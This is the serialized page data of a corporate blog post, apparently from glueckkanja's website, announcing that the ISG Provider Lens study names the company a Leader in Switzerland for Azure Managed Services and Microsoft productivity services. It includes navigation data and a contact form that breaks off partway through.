[{"data":1,"prerenderedAt":8727},["ShallowReactive",2],{"global-header":3,"global-footer":762,"post-en--posts-2026-07-31-isg-switzerland-2026-d84d218e1a92e":800,"authors_data":1038,"content-en-list-a91ba9a39090a":1383},{"lang":4,"home":5,"navigation":21,"meta":747,"contact":755},"de",{"folderSwitch":6,"name":9,"imgLight":10,"img":11,"languages":12},[7,8],"authors","blog","home","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"de":13,"en":17,"es":19},{"title":14,"url":15,"alias":15,"alt":16},"Home","/de","glueckkanja Logo",{"title":14,"url":18,"alt":16},"/en",{"title":14,"url":20,"alt":16},"/es",[22,195,369,496,601,614],{"name":23,"languages":24,"children":32},"workplace",{"de":25,"en":28,"es":30},{"title":26,"description":27},"Workplace","Microsoft 365-Power für smarte, sichere und flexible Arbeitswelten, die modernste Technologien und Identity Lösungen verbinden.",{"title":26,"description":29},"Microsoft 365-powered for smart, secure, and flexible workspaces, seamlessly integrating cutting-edge technologies and identity services.",{"title":26,"description":31},"Potenciado por Microsoft 365 para espacios de trabajo inteligentes, seguros y flexibles, integrando a la perfección tecnologías de vanguardia y servicios de identidad (en ingles).",[33,81,137],{"name":34,"languages":35,"children":40},"portfolio",{"de":36,"en":38,"es":39},{"title":37},"Portfolio",{"title":37},{"title":37},[41,51,61,71],{"name":42,"languages":43},"managed-intune",{"de":44,"en":47,"es":49},{"title":45,"url":46},"Managed Intune","/de/entra-intune/managed-intune",{"title":45,"url":48},"/en/entra-intune/managed-intune",{"title":45,"url":50},"/es/entra-intune/managed-intune",{"name":52,"languages":53},"managed-entra",{"de":54,"en":57,"es":59},{"title":55,"url":56},"Managed Entra","/de/entra-intune/managed-entra",{"title":55,"url":58},"/en/entra-intune/managed-entra",{"title":55,"url":60},"/es/entra-intune/managed-entra",{"name":62,"languages":63},"managed-workplace",{"de":64,"en":67,"es":69},{"title":65,"url":66},"Managed Workplace","/de/workplace/managed-workplace",{"title":65,"url":68},"/en/workplace/managed-workplace",{"title":65,"url":70},"/es/workplace/managed-workplace",{"name":72,"languages":73},"consulting-services",{"de":74,"en":77,"es":79},{"title":75,"url":76},"Consulting Services","/de/workplace/consulting-services",{"title":75,"url":78},"/en/workplace/consulting-services",{"title":75,"url":80},"/es/workplace/consulting-services",{"name":82,"languages":83,"children":88},"microsoft-365-endpoint",{"de":84,"en":86,"es":87},{"title":85},"Microsoft 365 Endpoint",{"title":85},{"title":85},[89,99,109,119,127],{"name":90,"languages":91},"microsoft-entra-suite",{"de":92,"en":95,"es":97},{"title":93,"url":94},"Microsoft Entra Suite","/de/workplace/microsoft-entra-suite",{"title":93,"url":96},"/en/workplace/microsoft-entra-suite",{"title":93,"url":98},"/es/workplace/microsoft-entra-suite",{"name":100,"languages":101},"microsoft-intune",{"de":102,"en":105,"es":107},{"title":103,"url":104},"Microsoft Intune","/de/workplace/microsoft-intune",{"title":103,"url":106},"/en/workplace/microsoft-intune",{"title":103,"url":108},"/es/workplace/microsoft-intune",{"name":110,"languages":111},"microsoft-windows",{"de":112,"en":115,"es":117},{"title":113,"url":114},"Microsoft Windows","/de/workplace/microsoft-windows",{"title":113,"url":116},"/en/workplace/microsoft-windows",{"title":113,"url":118},"/es/workplace/microsoft-windows",{"name":120,"languages":121},"windows-365-cloud-pc",{"en":122,"es":125},{"title":123,"url":124},"Windows 365 Cloud PC","/en/workplace/windows365-cloud-pc",{"title":123,"url":126},"/es/workplace/windows365-cloud-pc",{"name":128,"languages":129},"cloud-workplace-foundation",{"de":130,"en":133,"es":135},{"title":131,"url":132},"Cloud Workplace Foundation","/de/workplace/cloud-workplace-foundation",{"title":131,"url":134},"/en/workplace/cloud-workplace-foundation",{"title":131,"url":136},"/es/workplace/cloud-workplace-foundation",{"name":138,"languages":139,"children":144},"microsoft-365-collaboration",{"de":140,"en":142,"es":143},{"title":141},"Microsoft 365 Collaboration",{"title":141},{"title":141},[145,155,165,175,185],{"name":146,"languages":147},"microsoft-copilot",{"de":148,"en":151,"es":153},{"title":149,"url":150},"Microsoft 365 Copilot","/de/workplace/microsoft-365-copilot",{"title":149,"url":152},"/en/workplace/microsoft-365-copilot",{"title":149,"url":154},"/es/workplace/microsoft-365-copilot",{"name":156,"languages":157},"microsoft-teams",{"de":158,"en":161,"es":163},{"title":159,"url":160},"Teams","/de/workplace/microsoft-teams",{"title":159,"url":162},"/en/workplace/microsoft-teams",{"title":159,"url":164},"/es/workplace/microsoft-teams",{"name":166,"languages":167},"sharepoint-powerplatform",{"de":168,"en":171,"es":173},{"title":169,"url":170},"SharePoint & Power Platform","/de/workplace/sharepoint-power-platform",{"title":169,"url":172},"/en/workplace/sharepoint-power-platform",{"title":169,"url":174},"/es/workplace/sharepoint-power-platform",{"name":176,"languages":177},"exchange-online",{"de":178,"en":181,"es":183},{"title":179,"url":180},"Exchange Online","/de/workplace/exchange-online",{"title":179,"url":182},"/en/workplace/exchange-online",{"title":179,"url":184},"/es/workplace/exchange-online",{"name":186,"languages":187},"information-protection-compliance",{"de":188,"en":191,"es":193},{"title":189,"url":190},"Information Protection & Compliance","/de/workplace/information-protection-compliance",{"title":189,"url":192},"/en/workplace/information-protection-compliance",{"title":189,"url":194},"/es/workplace/information-protection-compliance",{"name":196,"languages":197,"children":205},"azure",{"de":198,"en":201,"es":203},{"title":199,"description":200},"Azure","Mit Azure Wachstum beflügeln: Cloud-Kosten senken, Effizienz steigern und Innovationen durch IaaS und PaaS vorantreiben.",{"title":199,"description":202},"Fuel growth with Azure: Cut cloud costs, boost efficiency, and drive innovation through IaaS and PaaS.",{"title":199,"description":204},"Impulse el crecimiento con Azure: Reduzca los costes de la nube, aumente la eficiencia e impulse la innovación a través de IaaS y PaaS (en ingles).",[206,233,307],{"name":207,"languages":208,"children":212},"azure-portfolio",{"de":209,"en":210,"es":211},{"title":37},{"title":37},{"title":37},[213,223],{"name":214,"languages":215},"azure-managed-services",{"de":216,"en":219,"es":221},{"title":217,"url":218},"Azure Managed Services","/de/azure/azure-managed-services",{"title":217,"url":220},"/en/azure/azure-managed-services",{"title":217,"url":222},"/es/azure/azure-managed-services",{"name":224,"languages":225},"azure-consulting",{"de":226,"en":229,"es":231},{"title":227,"url":228},"Azure Consulting","/de/azure/azure-consulting",{"title":227,"url":230},"/en/azure/azure-consulting",{"title":227,"url":232},"/es/azure/azure-consulting",{"name":234,"languages":235,"children":241},"azure-scenarios",{"de":236,"en":238,"es":240},{"title":237},"Szenarios",{"title":239},"Scenarios",{"title":239},[242,253,264,275,287,297],{"name":243,"languages":244},"plan-your-cloud",{"de":245,"en":248,"es":251},{"title":246,"url":247},"Planen Sie Ihre Cloud","/de/azure/plan-your-cloud",{"title":249,"url":250},"Plan your Cloud","/en/azure/plan-your-cloud",{"title":249,"url":252},"/es/azure/plan-your-cloud",{"name":254,"languages":255},"migrate-to-the-cloud",{"de":256,"en":259,"es":262},{"title":257,"url":258},"Migriere deine Cloud","/de/azure/migrate-to-the-cloud",{"title":260,"url":261},"Migrate to the cloud","/en/azure/migrate-to-the-cloud",{"title":260,"url":263},"/es/azure/migrate-to-the-cloud",{"name":265,"languages":266},"innovate-your-business",{"de":267,"en":270,"es":273},{"title":268,"url":269},"Erneuere dein Business","/de/azure/innovate-your-business",{"title":271,"url":272},"Innovate your business","/en/azure/innovate-your-business",{"title":271,"url":274},"/es/azure/innovate-your-business",{"name":276,"languages":277},"vmware-exit",{"de":278,"en":281,"es":284},{"title":279,"url":280},"Überdenke deine VMware-Strategie","/de/azure/vmware-exit",{"title":282,"url":283},"Rethink your VMware strategy","/en/azure/vmware-exit",{"title":285,"url":286},"Replantea tu estrategia de VMware","/es/azure/vmware-exit",{"name":288,"languages":289},"azure-cloud-adoption-framework",{"de":290,"en":293,"es":295},{"title":291,"url":292},"Cloud Adoption Framework","/de/azure/cloud-adoption-framework",{"title":291,"url":294},"/en/azure/cloud-adoption-framework",{"title":291,"url":296},"/es/azure/cloud-adoption-framework",{"name":298,"languages":299},"azure-cloud-competence-center",{"de":300,"en":303,"es":305},{"title":301,"url":302},"Cloud Competence Center","/de/azure/cloud-competence-center",{"title":301,"url":304},"/en/azure/cloud-competence-center",{"title":301,"url":306},"/es/azure/cloud-competence-center",{"name":308,"languages":309,"children":314},"azure-practices",{"de":310,"en":312,"es":313},{"title":311},"Practices",{"title":311},{"title":311},[315,325,335,345,354,359],{"name":316,"languages":317},"azure-foundation",{"de":318,"en":321,"es":323},{"title":319,"url":320},"Azure Foundation","/de/azure/azure-foundation",{"title":319,"url":322},"/en/azure/azure-foundation",{"title":319,"url":324},"/es/azure/azure-foundation",{"name":326,"languages":327},"azure-ai-foundation",{"de":328,"en":331,"es":333},{"title":329,"url":330},"Azure AI Foundation","/de/azure/azure-ai-foundation",{"title":329,"url":332},"/en/azure/azure-ai-foundation",{"title":329,"url":334},"/es/azure/azure-ai-foundation",{"name":336,"languages":337},"azure-data-foundation",{"de":338,"en":341,"es":343},{"title":339,"url":340},"Azure Data Foundation","/de/azure/azure-data-foundation",{"title":339,"url":342},"/en/azure/azure-data-foundation",{"title":339,"url":344},"/es/azure/azure-data-foundation",{"name":316,"languages":346},{"de":347,"en":350,"es":352},{"title":348,"url":349},"Azure Container Foundation","/de/azure/azure-container-foundation",{"title":348,"url":351},"/en/azure/azure-container-foundation",{"title":348,"url":353},"/es/azure/azure-container-foundation",{"name":128,"languages":355},{"de":356,"en":357,"es":358},{"title":131,"url":132},{"title":131,"url":134},{"title":131,"url":136},{"name":360,"languages":361},"dark-tenant",{"de":362,"en":365,"es":367},{"title":363,"url":364},"Managed Dark Tenant","/de/azure/managed-dark-tenant",{"title":363,"url":366},"/en/azure/managed-dark-tenant",{"title":363,"url":368},"/es/azure/managed-dark-tenant",{"name":370,"languages":371,"children":388},"security",{"de":372,"en":380,"es":384},{"title":373,"description":374,"emergency":375},"Security","Wachsamkeit in der Cloud mit einem preisgekrönten 24/7 Managed Service, Incident Response und modernstem Schutz für Ihre Infrastruktur.",{"text":376,"href":377,"skin":378,"icon":379},"Under Attack?","/de/security/are-you-under-attack","primary","emergency",{"title":373,"description":381,"emergency":382},"Vigilance in the cloud with an award-winning 24/7 managed service, incident response and state-of-the-art protection for your infrastructure.",{"text":376,"href":383,"skin":378,"icon":379},"/en/security/are-you-under-attack",{"title":373,"description":385,"emergency":386},"Vigilancia en la nube con un galardonado servicio gestionado 24/7, respuesta ante incidentes y protección de vanguardia para su infraestructura (en ingles).",{"text":376,"href":387,"skin":378,"icon":379},"/es/security/are-you-under-attack",[389,418,451],{"name":390,"children":391},"security-security-consulting",[392,402,408],{"name":393,"languages":394},"managed-red-tenant",{"de":395,"en":398,"es":400},{"title":396,"url":397},"Managed Red Tenant","/de/security/managed-red-tenant",{"title":396,"url":399},"/en/security/managed-red-tenant",{"title":396,"url":401},"/es/security/managed-red-tenant",{"name":360,"languages":403},{"de":404,"en":406,"es":407},{"title":405,"url":364},"Dark Tenant",{"title":405,"url":366},{"title":405,"url":368},{"name":409,"languages":410},"security-consulting",{"de":411,"en":414,"es":416},{"title":412,"url":413},"Security Consulting","/de/security/security-consulting",{"title":412,"url":415},"/en/security/security-consulting",{"title":412,"url":417},"/es/security/security-consulting",{"name":419,"children":420},"security-cloud-security-operations-center",[421,431,441],{"name":422,"languages":423},"cloud-security-operations-center",{"de":424,"en":427,"es":429},{"title":425,"url":426},"Cloud Security Operations Center","/de/security/cloud-security-operations-center",{"title":425,"url":428},"/en/security/cloud-security-operations-center",{"title":425,"url":430},"/es/security/cloud-security-operations-center",{"name":432,"languages":433},"global-secure-access",{"de":434,"en":437,"es":439},{"title":435,"url":436},"Global Secure Access","/de/security/global-secure-access",{"title":435,"url":438},"/en/security/global-secure-access",{"title":435,"url":440},"/es/security/global-secure-access",{"name":442,"languages":443},"my-work-id",{"de":444,"en":447,"es":449},{"title":445,"url":446},"MyWorkID","/de/security/my-work-id",{"title":445,"url":448},"/en/security/my-work-id",{"title":445,"url":450},"/es/security/my-work-id",{"name":452,"children":453},"security-preventive-services",[454,464,474,484],{"name":455,"languages":456},"preventive-services",{"de":457,"en":460,"es":462},{"title":458,"url":459},"Preventive Services","/de/security/preventive-services",{"title":458,"url":461},"/en/security/preventive-services",{"title":458,"url":463},"/es/security/preventive-services",{"name":465,"languages":466},"data-security-services",{"de":467,"en":470,"es":472},{"title":468,"url":469},"Data Security Service","/de/security/data-security-service",{"title":468,"url":471},"/en/security/data-security-service",{"title":468,"url":473},"/es/security/data-security-service",{"name":475,"languages":476},"security-copilot-agents",{"de":477,"en":480,"es":482},{"title":478,"url":479},"Security Copilot Agents","/de/security/security-copilot-agents",{"title":478,"url":481},"/en/security/security-copilot-agents",{"title":478,"url":483},"/es/security/security-copilot-agents",{"name":485,"languages":486},"nis2",{"de":487,"en":490,"es":493},{"title":488,"url":489},"NIS2 technisch umsetzen","/de/security/red-dark-tenant-nis2",{"title":491,"url":492},"Implementing NIS2","/en/security/red-dark-tenant-nis2",{"title":494,"url":495},"Implementación técnica de NIS2","/es/security/red-dark-tenant-nis2",{"name":497,"languages":498,"children":508},"products",{"de":499,"en":502,"es":505},{"title":500,"description":501},"Produkte","Innovative Companion-Produkte für eine vollständig sichere, 100% cloud-native Microsoft-Umgebung, die Zusammenarbeit, Netzwerkauthentifizierung und Softwareverwaltung verbessern.",{"title":503,"description":504},"Products","Innovative companion products for a completely secure, 100% cloud-native Microsoft environment that enhance collaboration, network authentication and software management.",{"title":506,"description":507},"Productos","Innovadores productos complementarios para un entorno Microsoft completamente seguro y 100% nativo de la nube que mejoran la colaboración, la autenticación en red y la gestión del software (en ingles).",[509,562],{"name":510,"products":511,"children":512},"lorem ipsum 1",true,[513,526,538,550],{"name":514,"img":515,"target":516,"languages":517},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"de":518,"en":522,"es":524},{"title":519,"subtitle":520,"url":521},"RealmJoin","Cloudbasierte Softwareverteilung","https://www.realmjoin.com",{"title":519,"subtitle":523,"url":521},"Cloudbased Software distribution",{"title":519,"subtitle":525,"url":521},"Distribución de software en la nube",{"name":527,"img":528,"target":516,"languages":529},"scepman","products/scepman/scepman-nav-logo.svg",{"de":530,"en":534,"es":536},{"title":531,"subtitle":532,"url":533},"SCEPman","Zertifikatsverteilung aus der Cloud","https://www.scepman.com",{"title":531,"subtitle":535,"url":533},"Certificate distribution from the cloud",{"title":531,"subtitle":537,"url":533},"Distribución de certificados desde la nube",{"name":539,"img":540,"target":516,"languages":541},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"de":542,"en":546,"es":548},{"title":543,"subtitle":544,"url":545},"KONNEKT","Arbeiten Sie lokal mit Ihren Office 365-Daten","https://www.konnekt.io",{"title":543,"subtitle":547,"url":545},"Work with your local office 365 data",{"title":543,"subtitle":549,"url":545},"Trabaje con sus datos locales de office 365",{"name":551,"img":552,"target":516,"languages":553},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"de":554,"en":558,"es":560},{"title":555,"subtitle":556,"url":557},"RealMigrator","Migrieren Sie alle Ihre Datenressourcen","https://www.realmigrator.com",{"title":555,"subtitle":559,"url":557},"Migrate your data from one server to another",{"title":555,"subtitle":561,"url":557},"Migre sus datos de un servidor a otro",{"name":563,"products":511,"children":564},"lorem ipsum 2",[565,577,589],{"name":566,"img":567,"target":516,"languages":568},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"de":569,"en":573,"es":575},{"title":570,"subtitle":571,"url":572},"TerraProvider","Terraform Provider für Microsoft 365","https://www.terraprovider.com",{"title":570,"subtitle":574,"url":572},"Terraform Provider for Microsoft 365",{"title":570,"subtitle":576,"url":572},"Terraform Provider para Microsoft 365",{"name":578,"img":579,"target":516,"languages":580},"radiusaas","products/radius/radius-nav-logo.svg",{"de":581,"en":585,"es":587},{"title":582,"subtitle":583,"url":584},"RADIUSaaS","Authentifizierung für Ihr Netzwerk","https://www.radius-as-a-service.com",{"title":582,"subtitle":586,"url":584},"Authentication for your network",{"title":582,"subtitle":588,"url":584},"Autenticación para su red",{"name":590,"img":591,"target":516,"languages":592},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"de":593,"en":597,"es":599},{"title":594,"subtitle":595,"url":596},"Unified Contacts","Finden Sie alle Ihre Kontakte in Microsoft Teams","https://www.unified-contacts.com",{"title":594,"subtitle":598,"url":596},"Find contacts in Microsoft Teams",{"title":594,"subtitle":600,"url":596},"Buscar contactos en Microsoft Teams",{"name":602,"languages":603},"casestudies",{"de":604,"en":608,"es":611},{"title":605,"description":606,"url":607},"Case Studies","Pionier in der Cloud: Ihr Top-Microsoft-Partner für umfassende Cloud-Lösungen mit einem Blueprint-basierten Ansatz und Infrastructure-as-Code-Expertise.","/de/casestudies",{"title":605,"description":609,"url":610},"Pioneer in the Cloud: Your top Microsoft partner for comprehensive cloud solutions with a Blueprint-based approach and Infrastructure-as-Code expertise.","/en/casestudies",{"title":605,"description":612,"url":613},"Pionero en la Cloud: Su principal socio de Microsoft para soluciones integrales en la nube con un enfoque basado en Blueprint y experiencia en infraestructura como código (en ingles).","/es/casestudies",{"name":615,"languages":616,"children":623},"company",{"de":617,"en":619,"es":621},{"title":618,"description":606},"Unternehmen",{"title":620,"description":609},"Company",{"title":622,"description":612},"Empresa",[624,680,717],{"name":625,"languages":626,"children":633},"company-about-us",{"de":627,"en":629,"es":631},{"title":628},"Über Uns",{"title":630},"About us",{"title":632},"Acerca de nosotros",[634,645,657,669],{"name":635,"languages":636},"company-facts-figures",{"de":637,"en":640,"es":642},{"title":638,"url":639},"Facts & Figures","/de/company/facts-and-figures",{"title":638,"url":641},"/en/company/facts-and-figures",{"title":643,"url":644},"Datos y cifras","/es/company/facts-and-figures",{"name":646,"languages":647},"company-contact",{"de":648,"en":651,"es":654},{"title":649,"url":650},"Kontakt & Standorte","/de/company/contact-and-locations",{"title":652,"url":653},"Contact & Locations","/en/company/contact-and-locations",{"title":655,"url":656},"Contacto y ubicaciones","/es/company/contact-and-locations",{"name":658,"languages":659},"switzerland",{"de":660,"en":663,"es":666},{"title":661,"url":662},"glueckkanja Schweiz","/de/company/switzerland",{"title":664,"url":665}," glueckkanja Switzerland","/en/company/switzerland",{"title":667,"url":668},"glueckkanja Suiza","/es/company/switzerland",{"name":670,"languages":671},"austria",{"de":672,"en":675,"es":678},{"title":673,"url":674},"glueckkanja Österreich","/de/company/austria",{"title":676,"url":677},"glueckkanja Austria","/en/company/austria",{"title":676,"url":679},"/es/company/austria",{"name":681,"languages":682,"children":689},"company-career",{"de":683,"en":685,"es":687},{"title":684},"Karriere",{"title":686},"Career",{"title":688},"Carreras",[690,702,708],{"name":691,"languages":692},"company-career-overview",{"de":693,"en":696,"es":699},{"title":694,"url":695},"Karriere Übersicht","/de/career",{"title":697,"url":698},"Career overview","/en/career",{"title":700,"url":701},"Carrera general","/es/career",{"name":703,"languages":704},"company-young-professionals",{"de":705},{"title":706,"url":707},"Young Professionals","/de/young-professionals",{"name":709,"languages":710},"company-jobs",{"de":711,"en":714},{"title":712,"url":713},"Stellenanzeigen","/de/job-offers",{"title":715,"url":716},"Job offers","/en/job-offers",{"name":718,"languages":719,"children":726},"company-latest",{"de":720,"en":722,"es":724},{"title":721},"Aktuelles",{"title":723},"Latest",{"title":725},"Últimas novedades",[727,737],{"name":728,"languages":729},"company-blog",{"de":730,"en":733,"es":735},{"title":731,"url":732},"Blog","/de/blog",{"title":731,"url":734},"/en/blog",{"title":731,"url":736},"/es/blog",{"name":728,"languages":738},{"de":739,"en":742,"es":744},{"title":740,"url":741},"Events","/de/events",{"title":740,"url":743},"/en/events",{"title":745,"url":746},"Eventos","/es/events",[748],{"name":749,"languages":750},"career-meta",{"de":751,"en":753,"es":754},{"title":684,"url":695,"active":752},false,{"title":686,"url":698,"active":752},{"title":686,"url":701,"active":752},{"languages":756},{"de":757,"en":759,"es":761},{"title":758,"url":650,"active":752},"Kontakt",{"title":760,"url":653,"active":752},"Contact",{"title":760,"url":656,"active":752},{"data":763},{"bgColor":764,"number":765,"mail":766,"brandLogos":767,"logos":768,"links":772,"linksEn":782,"linksEs":791},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[769],{"img":10,"alt":16,"url":770,"class":771},"index.html","max-w-19rem",[773,776,779],{"title":774,"url":775},"Datenschutz","/de/privacy",{"title":777,"url":778},"Impressum","/de/imprint",{"title":780,"url":781},"No Cookies","/de/cookies",[783,786,789],{"title":784,"url":785},"Privacy","/en/privacy",{"title":787,"url":788},"Imprint","/en/imprint",{"title":780,"url":790},"/en/cookies",[792,794,797],{"title":793,"url":785},"Privacidad",{"title":795,"url":796},"Imprimir","/es/imprint",{"title":798,"url":799},"Sin Cookies","/es/cookies",{"id":801,"title":802,"author":803,"body":805,"cta":767,"description":936,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":939,"moment":943,"navigation":511,"path":1031,"seo":1032,"stem":1033,"tags":1034,"webcast":752,"__hash__":1037},"content_en/posts/2026-07-31-isg-switzerland-2026.md","From Rising Star to Leader. glueckkanja in the ISG Study Switzerland 2026",[804],"Carolin Kanja",{"type":806,"value":807,"toc":926},"minimal",[808,818,823,826,829,833,835,842,845,852,858,862,864,870,873,878,891,923],[809,810,811,812,817],"p",{},"In 2024, we founded glueckkanja Switzerland AG and moved into an office at zentroom, Bahnhofplatz 10b, in Bern. In 2025, ISG named us a ",[813,814,816],"a",{"href":815},"/en/posts/2025-05-08-isg-switzerland-2025","Rising Star in the Swiss market",", the provider its analysts expected to reach the Leader quadrant. Now that leap is on record: the ISG Provider Lens® study 2026 positions us as a Leader in Switzerland in the Microsoft AI and Cloud Ecosystem quadrant, in the areas of Azure Managed Services and Microsoft Productivity and Business Process Services.",[819,820,822],"h2",{"id":821},"the-study","The study",[809,824,825],{},"{: .h3-font-size}",[809,827,828],{},"With its Provider Lens® series, ISG evaluates every year which service providers are competitive in a national market. Providers are positioned per quadrant by portfolio attractiveness and competitive strength, from Contender to Leader. For Switzerland, ISG examined the market around the Microsoft ecosystem in 2026 under the title Microsoft AI and Cloud Ecosystem: 35 providers, positioned across the three quadrants Microsoft Productivity and Business Process Services, Azure Data Transformation and AI Services, and Azure Managed Services. The lead author is Axel Oppermann, and his market assessment is unambiguous: in the Swiss market, data residency, sovereignty and controllable AI operations decide who wins contracts, not the size of the platform.",[819,830,832],{"id":831},"leader-in-azure-managed-services","Leader in Azure Managed Services",[809,834,825],{},[809,836,837],{},[838,839],"img",{"alt":840,"src":841},"ISG Provider Lens quadrant Azure Managed Services Switzerland 2026: glueckkanja in the Leader quadrant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg-azure-managed-services-leader-ch.png",[809,843,844],{},"A year ago, the analysts still saw us as a Rising Star here. Now we are in the Leader quadrant. 25 providers qualified for this quadrant, eleven of which ISG classifies as Leaders.",[809,846,847,851],{},[848,849,850],"em",{},"\"glueckkanja writes Azure operations in code: GitOps, drift control and security standards keep hybrid cloud, workplace and AI environments manageable even under high automation adoption.\""," (Axel Oppermann, Lead Analyst, ISG)",[809,853,854,855,857],{},"The report's reasoning matches our operating model. For us, Azure operations are not an administrative task but a control architecture written in code: landing zones, tenant configurations and policies follow GitOps and infrastructure-as-code principles, and drift detection catches deviations before they reach the production environment uncontrolled. With the ",[813,856,396],{"href":399},", we fully separate privileged administrative paths from the production tenant, which reduces the impact of compromised identities, especially for energy providers and regulated environments. And because agents, automation and AI processes are assigned identities of their own, non-human identities stay under control through governance rules and security standards.",[819,859,861],{"id":860},"leader-in-microsoft-productivity-and-business-process-services","Leader in Microsoft Productivity and Business Process Services",[809,863,825],{},[809,865,866],{},[838,867],{"alt":868,"src":869},"ISG Provider Lens quadrant Microsoft Productivity and Business Process Services Switzerland 2026: glueckkanja in the Leader quadrant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg-msft-productivity-and-business-process-services-leader-ch.png",[809,871,872],{},"ISG also positions us as a Leader in the second area, which covers the work around Microsoft 365 and the modernization of business processes. Of 26 qualified providers, nine are in the Leader quadrant here.",[809,874,875,851],{},[848,876,877],{},"\"glueckkanja operates Microsoft 365, Copilot and Power Platform using code-based GitOps and identity models and makes agent-based workplace scenarios transparent for regulated Swiss customers through repeatable operational, security and compliance workflows.\"",[809,879,880,881,883,884,886,887,890],{},"The report highlights three strengths. We run Microsoft 365, Entra ID and Intune from the repository, with GitOps, infrastructure as code and blueprints instead of manually maintained structures. We treat identity as a security perimeter: ",[813,882,45],{"href":48},", ",[813,885,55],{"href":58}," and the Managed Red Tenant integrate privileged access, connectivity to our ",[813,888,889],{"href":428},"Managed SOC"," and collaboration structures into standardized operating models. And for agent-based scenarios, ISG counts us among the early providers of Agent Identity and agent-centric lifecycle models in the Microsoft ecosystem: Copilot, agent and Power Platform scenarios follow code-based role and approval paths rather than uncontrolled departmental dynamics.",[892,893,895,896,895,904,895,908],"blockquote",{"style":894},"border-left: none; background-color: var(--color-gk-violet); color: var(--color-gk-white); padding: 2.5rem 2rem; margin: 2rem 0;","\n  ",[897,898,903],"h3",{"className":899,"style":901,"id":902},[900],"h4-font-size","color: var(--color-gk-white);","the-team-behind-the-award","The team behind the award",[809,905,907],{"style":906},"font-size: inherit;","From Bern, we run Microsoft services for Swiss companies, to the same standards as at all our locations.",[813,909,918],{"role":910,"className":911,"dataText":916,"href":665,"type":917},"button",[912,913,914,915],"cta","btn","btn-primary","vue-component","glueckkanja in Switzerland","Button",[919,920,916],"span",{"className":921},[922],"cta__text",[809,924,925],{},"Two years from incorporation to the Leader quadrant: for that we say Merci vielmals, to our Swiss customers and to the team in Bern. If you want to dig deeper into the results, the form below gets you the full ISG overview.",{"title":927,"searchDepth":928,"depth":928,"links":929},"",2,[930,931,932],{"id":821,"depth":928,"text":822},{"id":831,"depth":928,"text":832},{"id":860,"depth":928,"text":861,"children":933},[934],{"id":902,"depth":935,"text":903},3,"In 2024, we founded glueckkanja Switzerland AG and moved into an office at zentroom, Bahnhofplatz 10b, in Bern. In 2025, ISG named us a Rising Star in the Swiss market, the provider its analysts expected to reach the Leader quadrant. Now that leap is on record: the ISG Provider Lens® study 2026 positions us as a Leader in Switzerland in the Microsoft AI and Cloud Ecosystem quadrant, in the areas of Azure Managed Services and Microsoft Productivity and Business Process Services.","md","post",{"lang":940,"seoTitle":941,"titleClass":942,"date":943,"categories":944,"blogtitlepic":946,"socialimg":947,"customExcerpt":948,"keywords":949,"contactInContent":950,"hreflang":1022,"published":511,"scripts":1030},"en","ISG Provider Lens 2026: glueckkanja is a Leader in Switzerland in the Microsoft AI and Cloud Ecosystem","h2-font-size","2026-07-31",[945],"Corporate","head-isg-ch-2026.png","/blog/heads/head-isg-ch-2026.png","The ISG Provider Lens® study 2026 positions glueckkanja as a Leader in Switzerland in the Microsoft AI and Cloud Ecosystem quadrant, for Azure Managed Services and Microsoft Productivity and Business Process Services. Two years after entering the market in Bern, one year after being named Rising Star.","MSSP Switzerland, Managed SOC Switzerland, Microsoft Partner Switzerland, ISG Provider Lens Switzerland 2026, ISG Leader Switzerland, Azure Managed Services Switzerland, Microsoft 365 Services Switzerland, Microsoft AI and Cloud Ecosystem, managed services Azure Switzerland, IT service provider Switzerland, cloud services Switzerland, Microsoft cloud Switzerland, glueckkanja Switzerland, glueckkanja Bern",{"quote":511,"infos":951},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":954,"subline":955,"level":819,"textStyling":956,"flush":957,"person":958,"form":975},"var(--color-gk-dark-blue)","var(--color-gk-white)","Request the study","Want to take a closer look at the results? Get in touch and we will send you the full ISG overview of our services in Switzerland.","text-light","justify-content-end",{"image":959,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":963,"detailsHeader":964,"details":965},"/people/people-jan-geisbauer.jpg","Portrait of Jan Geisbauer, Head of Security at glueckkanja","Jan Geisbauer","Head of Security","Two years after opening in Bern, we are in the Leader quadrant. For us, that means the approach of combining standardized Microsoft services with a local team works in the Swiss market.","We look forward to\u003Cbr />hearing from you!",[966,971],{"text":967,"href":968,"details":969,"icon":970},"+41 31 5611900","tel:+41 31 5611900","Call us","site/phone",{"text":972,"href":973,"icon":974},"sales@glueckkanja.com","mailto:sales@glueckkanja.com","site/mail",{"ctaText":976,"cta":977,"method":938,"action":979,"fields":980},"Submit",{"skin":978},"primary on-surface","/send",[981,985,990,993,997,1002,1007,1009,1012,1015,1018,1020],{"type":982,"id":983,"value":984},"hidden","_next","successful",{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},"Name*","text","name","Please enter your name.",{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},"Company*","Please enter your company.",{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},"Email address*","email","Please enter your email address.",{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},"Your message to us","textarea","message","Please enter a message.",{"label":1003,"type":1004,"id":1005,"required":511,"requiredMsg":1006},"Your data will be stored and used to process your request. You can find the details in our \u003Ca href=\"/en/privacy\">privacy policy\u003C/a>.","checkbox","dataprotection","Please confirm",{"type":982,"id":1008,"value":945},"_topic",{"type":982,"id":1010,"value":1011},"_location","CH",{"type":982,"id":1013,"value":1014},"_subject","Form: Blog ISG Switzerland 2026 | 